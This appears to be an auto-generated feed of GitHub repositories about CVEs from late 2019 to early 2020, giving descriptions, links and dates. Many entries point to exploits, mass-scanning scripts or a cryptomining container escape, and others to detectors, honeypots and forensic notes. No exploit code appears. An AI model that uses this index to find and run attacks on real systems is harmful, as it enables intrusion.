**no description** : [underprotection/CVE-2019-19550](https://github.com/underprotection/CVE-2019-19550) create time: 2020-01-30T00:11:20Z

**no description** : [TheCyberGeek/CVE-2020-5844](https://github.com/TheCyberGeek/CVE-2020-5844) create time: 2020-01-29T23:11:46Z

**no description** : [ianxtianxt/CVE-2016-8735](https://github.com/ianxtianxt/CVE-2016-8735) create time: 2020-01-29T11:12:37Z

**Python CVE-2019-19781 exploit** : [RaulCalvoLaorden/CVE-2019-19781](https://github.com/RaulCalvoLaorden/CVE-2019-19781) create time: 2020-01-28T12:09:51Z

***CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---** : [somhm-solutions/Shell-Shock](https://github.com/somhm-solutions/Shell-Shock) create time: 2020-01-28T07:48:46Z

**This repository contains the sources and documentation for the SWAPGS attack PoC (CVE-2019-1125)** : [bitdefender/swapgs-attack-poc](https://github.com/bitdefender/swapgs-attack-poc) create time: 2020-01-27T12:27:53Z

**Python3 script to scan for Linksys smart wifi devices that are vulnerable to CVE-2014-8244** : [JollyJumbuckk/LinksysLeaks](https://github.com/JollyJumbuckk/LinksysLeaks) create time: 2020-01-24T19:14:49Z

**CVE-2019-17570 details and proof of concept** : [orangecertcc/xmlrpc-common-deserialization](https://github.com/orangecertcc/xmlrpc-common-deserialization) create time: 2020-01-24T11:32:18Z

**a script to look for CVE-2019-19781 Vulnerability within a domain and it's subdomains** : [0xams/citrixvulncheck](https://github.com/0xams/citrixvulncheck) create time: 2020-01-23T15:13:04Z

**My Citrix ADC NetScaler CVE-2019-19781 Vulnerability DFIR notes.** : [Azeemering/CVE-2019-19781-DFIR-Notes](https://github.com/Azeemering/CVE-2019-19781-DFIR-Notes) create time: 2020-01-23T08:41:51Z

**:microscope: Jupyter notebook to help automate some of the forensic analysis related to Citrix Netscalers compromised via CVE-2019-19781** : [L4r1k/CitrixNetscalerAnalysis](https://github.com/L4r1k/CitrixNetscalerAnalysis) create time: 2020-01-23T04:59:51Z

**Exploit for PyInstaller CVE-2019-16784** : [AlterSolutions/PyInstallerPrivEsc](https://github.com/AlterSolutions/PyInstallerPrivEsc) create time: 2020-01-22T13:23:45Z

**Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts** : [x1sec/citrix-honeypot](https://github.com/x1sec/citrix-honeypot) create time: 2020-01-22T13:00:18Z

**CVE-2017-8809 Docker - RFD(Reflected File Download) for MediaWiki** : [motikan2010/CVE-2017-8809_MediaWiki_RFD](https://github.com/motikan2010/CVE-2017-8809_MediaWiki_RFD) create time: 2020-01-22T10:21:51Z

**Indicator of Compromise Scanner for CVE-2019-19781** : [citrix/ioc-scanner-CVE-2019-19781](https://github.com/citrix/ioc-scanner-CVE-2019-19781) create time: 2020-01-21T23:13:00Z

**Scanning for Remote Desktop Gateways (Potentially unpatched CVE-2020-0609 and CVE-2020-0610)** : [2d4d/rdg_scanner_cve-2020-0609](https://github.com/2d4d/rdg_scanner_cve-2020-0609) create time: 2020-01-21T21:33:17Z

**Indicator of Compromise Scanner for CVE-2019-19781** : [fireeye/ioc-scanner-CVE-2019-19781](https://github.com/fireeye/ioc-scanner-CVE-2019-19781) create time: 2020-01-21T15:20:25Z

**Código desenvolvido para a verificação em massa da vulnerabilidade CVE-2019-19781 de hosts descobertos pelo Shodan. Pull requests são bem vindas.** : [digitalgangst/massCitrix](https://github.com/digitalgangst/massCitrix) create time: 2020-01-21T15:18:08Z

**no description** : [TheCyberGeek/CVE-2019-19369](https://github.com/TheCyberGeek/CVE-2019-19369) create time: 2020-01-21T12:26:00Z

**CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell** : [cbwang505/CVE-2019-0708-EXP-Windows](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows) create time: 2020-01-21T02:22:29Z

**Audit Guide for the Citrix ADC Vulnerability CVE-2019-19871. Collected from multiple sources and threat assessments. Will be updated as new methods come up.** : [VDISEC/CVE-2019-19871-AuditGuide](https://github.com/VDISEC/CVE-2019-19871-AuditGuide) create time: 2020-01-20T18:34:51Z

**Advisory & PoC** : [0x-nope/CVE-2019-12180](https://github.com/0x-nope/CVE-2019-12180) create time: 2020-01-20T17:33:23Z

**CVE-2019-19781 bash exploit** : [ynsmroztas/citrix.sh](https://github.com/ynsmroztas/citrix.sh) create time: 2020-01-20T15:30:30Z

**CVE-2017-12615 批量脚本** : [ianxtianxt/CVE-2017-12615](https://github.com/ianxtianxt/CVE-2017-12615) create time: 2020-01-20T14:56:05Z

**Exploit CVE-2017-9248 Telerik ReMix from Paul Taylor's script. Exploit Telerik lastest version fixed vuln. ReMix by TinoKa & Shaco JX** : [shacojx/dp](https://github.com/shacojx/dp) create time: 2020-01-20T07:13:54Z

**no description** : [DIVD-NL/Citrix-CVE-2019-19781](https://github.com/DIVD-NL/Citrix-CVE-2019-19781) create time: 2020-01-20T06:18:39Z

**Dumb Fuzzer used to find CVE-2010-1411** : [MAVProxyUser/httpfuzz-robomiller](https://github.com/MAVProxyUser/httpfuzz-robomiller) create time: 2020-01-20T03:12:03Z

**Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters.** : [JoseBarrios/CVE-2007-2447](https://github.com/JoseBarrios/CVE-2007-2447) create time: 2020-01-20T02:30:35Z

**tfp0 based on CVE-2019-8591/CVE-2019-8605** : [jsherman212/used_sock](https://github.com/jsherman212/used_sock) create time: 2020-01-20T00:33:37Z

**how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP** : [hktalent/CVE-2020-2551](https://github.com/hktalent/CVE-2020-2551) create time: 2020-01-19T13:01:32Z

**no description** : [r00t4dm/CVE-2019-17570](https://github.com/r00t4dm/CVE-2019-17570) create time: 2020-01-19T02:57:26Z

**Mini-paper on CVE-2017-2751, HP EFI password extraction.** : [BaderSZ/CVE-2017-2751](https://github.com/BaderSZ/CVE-2017-2751) create time: 2020-01-19T00:41:23Z

**CVE-2019-14899** : [stryngs/hysteria](https://github.com/stryngs/hysteria) create time: 2020-01-18T19:05:19Z

**CVE-2019-19844 Docker Edition** : [0xsha/CVE_2019_19844](https://github.com/0xsha/CVE_2019_19844) create time: 2020-01-18T13:32:21Z

**no description** : [No1zy/CVE-2018-6574-PoC](https://github.com/No1zy/CVE-2018-6574-PoC) create time: 2020-01-18T10:21:08Z

**[CVE-2019-14615] iGPU Leak: An Information Leakage Vulnerability on Intel Integrated GPU** : [HE-Wenjian/iGPU-Leak](https://github.com/HE-Wenjian/iGPU-Leak) create time: 2020-01-18T08:23:46Z

**Centreon =<19.10 Authenticated RCE** : [SpengeSec/CVE-2019-19699](https://github.com/SpengeSec/CVE-2019-19699) create time: 2020-01-17T17:07:45Z

**CVE-2019-19781 Attack Triage Script** : [redscan/CVE-2019-19781](https://github.com/redscan/CVE-2019-19781) create time: 2020-01-17T16:14:30Z

**批量概念驗證用** : [b510/CVE-2019-19781](https://github.com/b510/CVE-2019-19781) create time: 2020-01-17T06:09:18Z

**PhantomJS uses internal module: webpage, to open, close, render, and perform multiple actions on webpages, which suffers from an arbitrary file read vulnerability. The vulnerability exists in the page.open() function of the webpage module, which loads the specified URL and calls a given callback. When opening a HTML file, an attacker can supply specially crafted file content, which allows reading arbitrary files on the filesystem. The vulnerability is demonstrated by using page.render() as the function callback, resulting in the generation of a PDF or an image of the targeted file.** : [h4ckologic/CVE-2019-17221](https://github.com/h4ckologic/CVE-2019-17221) create time: 2020-01-16T18:07:07Z

**Simple tool for testing vulnerability to CVE 2019-19781** : [LeapBeyond/cve_2019_19781](https://github.com/LeapBeyond/cve_2019_19781) create time: 2020-01-16T17:43:38Z

**Check ADC for CVE-2019-19781** : [j81blog/ADC-19781](https://github.com/j81blog/ADC-19781) create time: 2020-01-16T12:33:00Z

**no description** : [Castaldio86/Detect-CVE-2019-19781](https://github.com/Castaldio86/Detect-CVE-2019-19781) create time: 2020-01-16T10:09:05Z

**This script checks the Citrix Netscaler if it has been compromised by CVE-2019-19781 attacks and collects all file system information** : [DanielWep/CVE-NetScalerFileSystemCheck](https://github.com/DanielWep/CVE-NetScalerFileSystemCheck) create time: 2020-01-16T08:52:14Z

**A PoC for CVE-2020-0601** : [kudelskisecurity/chainoffools](https://github.com/kudelskisecurity/chainoffools) create time: 2020-01-15T23:15:32Z

**Automated forensic script hunting for cve-2019-19781** : [onSec-fr/CVE-2019-19781-Forensic](https://github.com/onSec-fr/CVE-2019-19781-Forensic) create time: 2020-01-15T20:43:37Z

**IOCs for CVE-2019-19781** : [digitalshadows/CVE-2019-19781_IOCs](https://github.com/digitalshadows/CVE-2019-19781_IOCs) create time: 2020-01-15T19:32:14Z

**Check your website for CVE-2019-19781 Vulnerable** : [zgelici/CVE-2019-19781-Checker](https://github.com/zgelici/CVE-2019-19781-Checker) create time: 2020-01-15T10:15:11Z

**updating services to fix Heart-bleed bug (CVE-2014-0160)** : [hack3r-0m/heartbleed_fix_updated](https://github.com/hack3r-0m/heartbleed_fix_updated) create time: 2020-01-15T07:31:04Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**no description** : [zenturacp/cve-2019-19781-web](https://github.com/zenturacp/cve-2019-19781-web) create time: 2020-01-14T21:54:08Z

**PoC Exploiting SQL Injection in Android's Download Provider in Sort Parameter (CVE-2019-2196)** : [IOActive/AOSP-DownloadProviderDbDumperSQLiLimit](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiLimit) create time: 2020-01-14T12:21:16Z

**PoC Exploiting SQL Injection in Android's Download Provider in Selection Parameter (CVE-2019-2198)** : [IOActive/AOSP-DownloadProviderDbDumperSQLiWhere](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiWhere) create time: 2020-01-14T12:20:18Z

**no description** : [Lanph3re/cve-2019-1108](https://github.com/Lanph3re/cve-2019-1108) create time: 2020-01-14T04:31:17Z

**The exploitation module for the CVE-2019-19781 #Shitrix (Vulnerability in Citrix Application Delivery Controller and Citrix Gateway).** : [mekhalleh/citrix_dir_traversal_rce](https://github.com/mekhalleh/citrix_dir_traversal_rce) create time: 2020-01-13T14:07:15Z

**Detect and log CVE-2019-19781 scan and exploitation attempts.** : [MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot) create time: 2020-01-13T10:09:31Z

**McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password** : [funoverip/mcafee_atd_CVE-2019-3663](https://github.com/funoverip/mcafee_atd_CVE-2019-3663) create time: 2020-01-13T08:42:13Z

**Automated script for Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.** : [aqhmal/CVE-2019-19781](https://github.com/aqhmal/CVE-2019-19781) create time: 2020-01-13T07:42:27Z

**Citrix Netscaler RCE** : [hollerith/CVE-2019-19781](https://github.com/hollerith/CVE-2019-19781) create time: 2020-01-13T02:14:59Z

**DFIR notes for Citrix ADC (NetScaler) appliances vulnerable to CVE-2019-19781** : [x1sec/CVE-2019-19781](https://github.com/x1sec/CVE-2019-19781) create time: 2020-01-12T23:13:56Z

**My working exploit script for Shitrix (CVE-2019-19781)** : [Jabo-SCO/Shitrix-CVE-2019-19781](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781) create time: 2020-01-12T18:53:29Z

**A fast multi threaded scanner for Citrix ADC (NetScaler) CVE-2019-19781 - Citrixmash / Shitrix** : [x1sec/citrixmash_scanner](https://github.com/x1sec/citrixmash_scanner) create time: 2020-01-12T15:16:54Z

**All Working Exploits** : [unknowndevice64/Exploits_CVE-2019-19781](https://github.com/unknowndevice64/Exploits_CVE-2019-19781) create time: 2020-01-11T20:43:09Z

**Took at stab at an NSE discovery script for CVE-2019-19781.** : [becrevex/Citrix_CVE-2019-19781](https://github.com/becrevex/Citrix_CVE-2019-19781) create time: 2020-01-11T18:04:17Z

**eWeLinkESPT is a tool that automatically decodes and decrypts the WiFi network credentials transmitted to a supported ESP-based IoT device by the eWeLink mobile application. (CVE-2020-12702)** : [salgio/ESPTouchCatcher](https://github.com/salgio/ESPTouchCatcher) create time: 2020-01-11T13:15:53Z

**CVE-2019-19781 Citrix RCE** : [oways/CVE-2019-19781](https://github.com/oways/CVE-2019-19781) create time: 2020-01-11T13:05:28Z

**CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit** : [mpgn/CVE-2019-19781](https://github.com/mpgn/CVE-2019-19781) create time: 2020-01-11T09:49:17Z

**Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]** : [ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781) create time: 2020-01-11T07:16:23Z

**Citrix ADC Remote Code Execution** : [jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781) create time: 2020-01-11T03:10:12Z

**Test a host for susceptibility to CVE-2019-19781** : [cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) create time: 2020-01-11T00:26:16Z

**This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.** : [trustedsec/cve-2019-19781](https://github.com/trustedsec/cve-2019-19781) create time: 2020-01-11T00:08:27Z

**Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]** : [projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781) create time: 2020-01-10T22:56:35Z

**The offical exploit for Pandora v7.0NG Post-auth Remote Code Execution CVE-2019-20224** : [mhaskar/CVE-2019-20224](https://github.com/mhaskar/CVE-2019-20224) create time: 2020-01-10T13:41:28Z

**CVE-2019-7238 Nexus RCE漏洞图形化一键检测工具。CVE-2019-7238 Nexus RCE Vul POC Tool.** : [magicming200/CVE-2019-7238_Nexus_RCE_Tool](https://github.com/magicming200/CVE-2019-7238_Nexus_RCE_Tool) create time: 2020-01-10T09:19:10Z

**no description** : [mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) create time: 2020-01-10T02:05:51Z

**Exploit code for CVE-2019-2729** : [waffl3ss/CVE-2019-2729](https://github.com/waffl3ss/CVE-2019-2729) create time: 2020-01-09T22:27:36Z

**Simple Overflow demo, like CVE-2017-11882 exp** : [ekgg/Overflow-Demo-CVE-2017-11882](https://github.com/ekgg/Overflow-Demo-CVE-2017-11882) create time: 2020-01-08T16:27:18Z

**Nagios XI远程命令执行漏洞 <v5.6.9** : [jas502n/CVE-2019-20197](https://github.com/jas502n/CVE-2019-20197) create time: 2020-01-08T08:16:30Z

**CVE-2019-20197** : [lp008/CVE-2019-20197](https://github.com/lp008/CVE-2019-20197) create time: 2020-01-08T08:11:58Z

**weblogic CVE-2019-2725利用exp。** : [GGyao/weblogic_2019_2725_wls_batch](https://github.com/GGyao/weblogic_2019_2725_wls_batch) create time: 2020-01-08T06:35:28Z

**https://www.rodneybeede.com/curriculum%20vitae/bio.html** : [rbeede/CVE-2019-5630](https://github.com/rbeede/CVE-2019-5630) create time: 2020-01-07T19:43:42Z

**CVE-2017-9841 detector script** : [mbrasile/CVE-2017-9841](https://github.com/mbrasile/CVE-2017-9841) create time: 2020-01-06T23:27:15Z

**no description** : [sdosis/cve-2018-6574](https://github.com/sdosis/cve-2018-6574) create time: 2020-01-06T22:56:25Z

**no description** : [bluefrostsecurity/CVE-2019-1215](https://github.com/bluefrostsecurity/CVE-2019-1215) create time: 2020-01-06T22:34:16Z

**no description** : [Any3ite/CVE-2014-6271](https://github.com/Any3ite/CVE-2014-6271) create time: 2020-01-06T08:24:35Z

**CVE-2019-10758** : [lp008/CVE-2019-10758](https://github.com/lp008/CVE-2019-10758) create time: 2020-01-05T14:05:56Z

**CVE-2019-17427 Persistent XSS POC** : [RealLinkers/CVE-2019-17427](https://github.com/RealLinkers/CVE-2019-17427) create time: 2020-01-03T19:25:54Z

**PoC repository for CVE-2020-6861: Ledger Monero App Spend key Extraction** : [ph4r05/ledger-app-monero-1.42-vuln](https://github.com/ph4r05/ledger-app-monero-1.42-vuln) create time: 2020-01-03T18:24:29Z

**Sketchup BMP Material RLE4 Heap Overflow** : [lagartojuancho/CVE-2013-3664_BMP](https://github.com/lagartojuancho/CVE-2013-3664_BMP) create time: 2020-01-03T17:05:48Z

**Sketchup MAC Pict Material Palette Stack Corruption** : [lagartojuancho/CVE-2013-3664_MAC](https://github.com/lagartojuancho/CVE-2013-3664_MAC) create time: 2020-01-03T16:53:55Z

**IBM Lotus Notes PNG Integer Overflow** : [lagartojuancho/CVE-2013-2977](https://github.com/lagartojuancho/CVE-2013-2977) create time: 2020-01-03T15:55:12Z

**Heap buffer overflow in GNOME gThumb and Linux Mint Pix** : [Fysac/CVE-2019-20326](https://github.com/Fysac/CVE-2019-20326) create time: 2020-01-03T01:39:03Z

**CVE-2019-18890 POC (Proof of Concept)** : [RealLinkers/CVE-2019-18890](https://github.com/RealLinkers/CVE-2019-18890) create time: 2020-01-02T11:44:47Z

**pentesterlab test payload** : [kev-ho/cve-2018-6574-payload](https://github.com/kev-ho/cve-2018-6574-payload) create time: 2020-01-02T09:03:25Z

**CVE-2017-8759 use file** : [zhengkook/CVE-2017-8759](https://github.com/zhengkook/CVE-2017-8759) create time: 2020-01-02T07:43:19Z

**Exploiting a patched vulnerability in JavaScriptCore** : [BadAccess11/CVE-2019-8601](https://github.com/BadAccess11/CVE-2019-8601) create time: 2020-01-02T00:12:22Z

**no description** : [alidnf/CVE-2019-13404](https://github.com/alidnf/CVE-2019-13404) create time: 2020-01-01T14:00:55Z

**CVE-2019-16278:Nostromo Web服务器的RCE漏洞** : [NHPT/CVE-2019-16278](https://github.com/NHPT/CVE-2019-16278) create time: 2020-01-01T13:28:40Z

**(Nhttpd) Nostromo 1.9.6 RCE due to Directory Traversal** : [Kr0ff/cve-2019-16278](https://github.com/Kr0ff/cve-2019-16278) create time: 2019-12-31T16:06:13Z

**samba 4.5.9** : [john-80/cve-2017-7494](https://github.com/john-80/cve-2017-7494) create time: 2019-12-30T04:33:39Z

**Identify vulnerable (RCE) vBulletin 5.0.0 - 5.5.4 instances using Shodan (CVE-2019-16759)** : [andripwn/pwn-vbulletin](https://github.com/andripwn/pwn-vbulletin) create time: 2019-12-29T18:49:15Z

**webmin_CVE-2019-15107** : [ChakoMoonFish/webmin_CVE-2019-15107](https://github.com/ChakoMoonFish/webmin_CVE-2019-15107) create time: 2019-12-29T11:02:35Z

**HttpFileServer httpd 2.3** : [roughiz/cve-2014-6287.py](https://github.com/roughiz/cve-2014-6287.py) create time: 2019-12-27T13:01:10Z

**CVE-2018-8639-EXP** : [timwhitez/CVE-2018-8639-EXP](https://github.com/timwhitez/CVE-2018-8639-EXP) create time: 2019-12-27T07:39:07Z

**no description** : [masahiro331/CVE-2019-10758](https://github.com/masahiro331/CVE-2019-10758) create time: 2019-12-26T06:58:56Z

**CVE-2013-3651 PoC - EC-CUBE 2** : [motikan2010/CVE-2013-3651](https://github.com/motikan2010/CVE-2013-3651) create time: 2019-12-26T04:43:38Z

**Apache Log4j 1.2.X存在反序列化远程代码执行漏洞** : [shadow-horse/CVE-2019-17571](https://github.com/shadow-horse/CVE-2019-17571) create time: 2019-12-25T16:46:11Z

**poc exploit for webmin backdoor (CVE-2019-15107 and CVE-2019-15231)** : [hannob/webminex](https://github.com/hannob/webminex) create time: 2019-12-25T13:47:02Z

**Enjoy hacking ;)** : [klinix5/CVE-2019-1385](https://github.com/klinix5/CVE-2019-1385) create time: 2019-12-25T11:03:52Z

**PoC for CVE-2019-19844 ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )** : [andripwn/django_cve201919844](https://github.com/andripwn/django_cve201919844) create time: 2019-12-25T10:05:48Z

**no description** : [SecT0uch/CVE-2019-17495-test](https://github.com/SecT0uch/CVE-2019-17495-test) create time: 2019-12-24T13:23:06Z

**Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)** : [tarantula-team/CVE-2019-19204](https://github.com/tarantula-team/CVE-2019-19204) create time: 2019-12-24T08:19:02Z

**An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read** : [tarantula-team/CVE-2019-19203](https://github.com/tarantula-team/CVE-2019-19203) create time: 2019-12-24T08:11:11Z

**no description** : [alidnf/CVE-2019-11730](https://github.com/alidnf/CVE-2019-11730) create time: 2019-12-22T19:14:05Z

**CVE-2018-6389: WordPress <= 4.9.x 拒绝服务(DOS)漏洞** : [ianxtianxt/CVE-2018-6389](https://github.com/ianxtianxt/CVE-2018-6389) create time: 2019-12-22T14:03:32Z

**一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能** : [YagamiiLight/Cerberus](https://github.com/YagamiiLight/Cerberus) create time: 2019-12-21T22:45:55Z

**Systematic Analysis of Lens-Expressed RNA-Binding Proteins** : [paullangard/CveklRBP2019](https://github.com/paullangard/CveklRBP2019) create time: 2019-12-21T19:54:42Z

**https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/CA20191218-01-security-notice-for-ca-client-automation-agent-for-windows.html** : [hessandrew/CVE-2019-19231](https://github.com/hessandrew/CVE-2019-19231) create time: 2019-12-21T09:23:51Z

**PoC for CVE-2019-19844(https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)** : [ryu22e/django_cve_2019_19844_poc](https://github.com/ryu22e/django_cve_2019_19844_poc) create time: 2019-12-21T04:30:34Z

**sploit** : [v-p-b/cve-2019-12750](https://github.com/v-p-b/cve-2019-12750) create time: 2019-12-21T00:44:25Z

**A coordinated disclosure and security advisory on Fermax Intercom DTML Injection vulneraiblity. Special thanks to Fermax International for prompt responses and allowing details to be publicized.** : [breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection](https://github.com/breaktoprotect/CVE-2017-16778-Intercom-DTMF-Injection) create time: 2019-12-20T07:20:50Z

**Eclipse Che CSRF leading to RCE** : [mgrube/CVE-2019-17633](https://github.com/mgrube/CVE-2019-17633) create time: 2019-12-19T20:22:12Z

**Demo for CVE-2017-7525** : [BassinD/jackson-RCE](https://github.com/BassinD/jackson-RCE) create time: 2019-12-19T07:45:21Z

**CVE-2019-10092 Docker - Apache HTTP Server** : [motikan2010/CVE-2019-10092_Docker](https://github.com/motikan2010/CVE-2019-10092_Docker) create time: 2019-12-18T14:15:13Z

**YetiShare v3.5.2 - v4.5.3 Cross-site scripting in log_file_viewer.php** : [jra89/CVE-2019-19738](https://github.com/jra89/CVE-2019-19738) create time: 2019-12-17T22:02:40Z

**YetiShare v3.5.2 - v4.5.3 Cross-site scripting in get_all_file_server_paths.ajax.php** : [jra89/CVE-2019-19733](https://github.com/jra89/CVE-2019-19733) create time: 2019-12-17T21:56:56Z

**Nalpeiron Licensing Service (NLSSRV32) arbitrary disk read [CVE-2019-19315]** : [monoxgas/mailorder](https://github.com/monoxgas/mailorder) create time: 2019-12-17T02:41:20Z

**CVE-2018-9995 POC** : [b510/CVE-2018-9995-POC](https://github.com/b510/CVE-2018-9995-POC) create time: 2019-12-16T12:05:41Z

**no description** : [SmoZy92/CVE-2019-11932](https://github.com/SmoZy92/CVE-2019-11932) create time: 2019-12-15T17:21:26Z

**Tool Suite for V0LTpwn (CVE-2019-11157). Code will be published soon.** : [zkenjar/v0ltpwn](https://github.com/zkenjar/v0ltpwn) create time: 2019-12-15T15:11:07Z

**no description** : [ianxtianxt/CVE-2019-15107](https://github.com/ianxtianxt/CVE-2019-15107) create time: 2019-12-15T13:42:28Z

**Explotation framework for CVE-2019-11687** : [kosmokato/bad-dicom](https://github.com/kosmokato/bad-dicom) create time: 2019-12-15T08:52:17Z

**0-sec.org** : [ianxtianxt/CVE-2019-2890](https://github.com/ianxtianxt/CVE-2019-2890) create time: 2019-12-14T08:01:53Z

**Tool to exploit CVE-2018-13341 and recover hidden account password on Crestron devices** : [axcheron/crestron_getsudopwd](https://github.com/axcheron/crestron_getsudopwd) create time: 2019-12-13T01:27:36Z

**Code sample for using exploit CVE-2019-5736 to mine bitcoin with no association to original container or user.** : [epsteina16/Docker-Escape-Miner](https://github.com/epsteina16/Docker-Escape-Miner) create time: 2019-12-12T16:57:13Z

**YetiShare SQL Injection in the fileIds parameter in _account_move_file_in_folder.ajax.php - v3.5.2** : [jra89/CVE-2019-19734](https://github.com/jra89/CVE-2019-19734) create time: 2019-12-12T14:31:49Z

**Yetishare SQL Injection (sSortDir_0) - v3.5.2 - v4.5.3** : [jra89/CVE-2019-19732](https://github.com/jra89/CVE-2019-19732) create time: 2019-12-12T12:08:49Z

**YetiShare password reset hash bruteforce - v3.5.2 - v4.5.3** : [jra89/CVE-2019-19735](https://github.com/jra89/CVE-2019-19735) create time: 2019-12-12T11:56:00Z

**Netis router RCE exploit ( CVE-2019-19356)** : [shadowgatt/CVE-2019-19356](https://github.com/shadowgatt/CVE-2019-19356) create time: 2019-12-12T11:01:23Z

**RCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.** : [noperator/CVE-2019-18935](https://github.com/noperator/CVE-2019-18935) create time: 2019-12-12T07:58:11Z

**For test** : [W2Ning/CVE-2019-3396](https://github.com/W2Ning/CVE-2019-3396) create time: 2019-12-12T07:40:22Z

**CVE-2019-2725-POC** : [N0b1e6/CVE-2019-2725-POC](https://github.com/N0b1e6/CVE-2019-2725-POC) create time: 2019-12-12T03:09:23Z

**Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19658](https://github.com/jra89/CVE-2019-19658) create time: 2019-12-11T14:13:51Z

**Chevereto reflected XSS in Website Name - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19651](https://github.com/jra89/CVE-2019-19651) create time: 2019-12-11T14:00:32Z

**Chevereto information disclosure <= 3.13.5 Core** : [jra89/CVE-2019-19653](https://github.com/jra89/CVE-2019-19653) create time: 2019-12-11T13:49:51Z

**Chevereto downgrade attack - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19652](https://github.com/jra89/CVE-2019-19652) create time: 2019-12-11T13:42:18Z

**Chevereto denial of service - <= 3.13.5 Core** : [jra89/CVE-2019-19654](https://github.com/jra89/CVE-2019-19654) create time: 2019-12-11T12:26:16Z

**CVE-2014-1322 - IPC Local Security Bypass | Mac OSX (Affected. >= 10.9.2)** : [raymondpittman/IPC-Memory-Mac-OSX-Exploit](https://github.com/raymondpittman/IPC-Memory-Mac-OSX-Exploit) create time: 2019-12-10T09:41:55Z

**详解 k8gege的SharePoint RCE exploit cve-2019-0604-exp.py的代码,动手制作自己的payload** : [boxhg/CVE-2019-0604](https://github.com/boxhg/CVE-2019-0604) create time: 2019-12-10T02:39:57Z

**FreePBX exploit <= 2.8.0** : [moayadalmalat/CVE-2010-3490](https://github.com/moayadalmalat/CVE-2010-3490) create time: 2019-12-09T15:49:21Z

**Proof of conecept for CVE-2019-16889 (Resource consumption on Ubiquiti Edgemax 1.10.6 and earlier** : [grampae/meep](https://github.com/grampae/meep) create time: 2019-12-09T00:09:08Z

**CVE-2008-1611 TFTP 1.41 buffer overflow exploit in the filepath** : [Axua/CVE-2008-1611](https://github.com/Axua/CVE-2008-1611) create time: 2019-12-08T17:18:31Z

**This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.4** : [jra89/CVE-2019-19634](https://github.com/jra89/CVE-2019-19634) create time: 2019-12-08T10:44:51Z

**lib/G/functions.php in Chevereto 1.0.0 through 1.1.4 Free, and through 3.13.5 Core, allows an attacker to perform bruteforce attacks without triggering the implemented protection mechanism by manipulating the X-Forwarded-For header in the request.** : [jra89/CVE-2019-19633](https://github.com/jra89/CVE-2019-19633) create time: 2019-12-08T10:42:28Z

**no description** : [Adelittle/Wordpressz_Dos_CVE_2018_6389](https://github.com/Adelittle/Wordpressz_Dos_CVE_2018_6389) create time: 2019-12-08T05:37:32Z

**CVE-2019-2890 WebLogic 反序列化RCE漏洞** : [jas502n/CVE-2019-2890](https://github.com/jas502n/CVE-2019-2890) create time: 2019-12-08T05:03:32Z

**Automated script for Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.** : [aqhmal/pulsexploit](https://github.com/aqhmal/pulsexploit) create time: 2019-12-07T17:09:24Z

**CVE-2019-0708 (BlueKeep)** : [worawit/CVE-2019-0708](https://github.com/worawit/CVE-2019-0708) create time: 2019-12-07T10:13:11Z

